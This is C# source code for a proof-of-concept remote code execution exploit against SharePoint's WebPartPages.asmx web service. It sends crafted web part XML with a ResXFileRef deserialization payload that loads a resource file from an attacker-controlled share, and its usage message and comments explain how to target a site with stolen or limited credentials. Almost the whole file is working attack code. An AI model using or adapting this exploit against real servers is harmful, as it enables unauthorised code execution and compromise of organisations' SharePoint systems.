private string GetWebPartPropertiesServiceCall(string storageKey, string pageUrl, string weburl)
{
string webPartXml = string.Empty;
try
{
var service = new WebPartPages.WebPartPagesWebService();
service.Url = weburl + "/_vti_bin/webpartpages.asmx";
service.Timeout = 18000000;
if (IsSPOnline)
{
service.CookieContainer = cookieContainer;
}
else
{
service.Credentials = new System.Net.NetworkCredential(uName, pwds, domain);
}
service.PreAuthenticate = true;
// Actual web service call which returns the information in string format
webPartXml = service.GetWebPart2(pageUrl, new Guid(storageKey), Storage.Shared, SPWebServiceBehavior.Version3);
}
catch (Exception ex)
{
WriteLine("Error in GetWebPartPropertiesServiceCall: " + pageUrl);
WriteLine(ex.Message);
}
return(webPartXml);
}
static void Main(string[] args)
{
try
{
if (args.Length != 5)
{
Console.WriteLine("Please provide necessary information:");
Console.WriteLine("SP_soap_RCE_PoC.exe <BaseUrl> <UserName> <Password> <Domain> <Remote_Path_To_Resource_File>");
Console.WriteLine("Example: SP_soap_RCE_PoC.exe http://Sharepont2019/siteofuser2/ user2 P@ssw0rd contoso //attackeVM/share/SP_soap_RCE_PoC.RCE_Resource.resources");
return;
}
string BaseURL = args[0];
string UserName = args[1];
string Password = args[2];
string Domain = args[3];
string RemotePath = args[4];
var TC_Type = "System.Resources.ResXFileRef, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089";
var BF_payload = RemotePath + "; System.Resources.ResourceSet, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089";
var URL = BaseURL.TrimEnd(new char[] { '/', ' ' }) + "/_vti_bin/WebPartPages.asmx";
var service = new WebPartPages.WebPartPagesWebService {
Url = URL
};
service.Credentials = new NetworkCredential(UserName, Password, Domain);
//Our WebPart xml with payload
string webPartXml = @"<webParts>
<webPart xmlns=""http://schemas.microsoft.com/WebPart/v3"">
<metaData>
<type name=""Microsoft.SharePoint.Portal.WebControls.BusinessDataListWebPart, Microsoft.SharePoint.Portal,Version=12.0.0.0,Culture=neutral,PublicKeyToken=71e9bce111e9429c"" />
<importErrorMessage>Attack may be successful!</importErrorMessage>
</metaData>
<data>
<properties>
<property name=""SomeFakeProperty"" type=""" + TC_Type + @""">" + BF_payload + @"</property>
</properties>
</data>
</webPart>
</webParts>";
//If an attacker has Add and Customize permissions to only some specific page
//he/she can use this method with pageUrl to this page
//var pageUrl = "/sitename/SitePages/Home.aspx";
//WebPartPages.Storage storage = WebPartPages.Storage.Personal;
//var result = service.AddWebPart(pageUrl, webPartXml, storage);
var result = service.RenderWebPartForEdit(webPartXml);
Console.WriteLine(result);
}
catch (Exception e)
{
Console.WriteLine("{0} Exception caught. with Message {1}", e, e.Message);
}
}
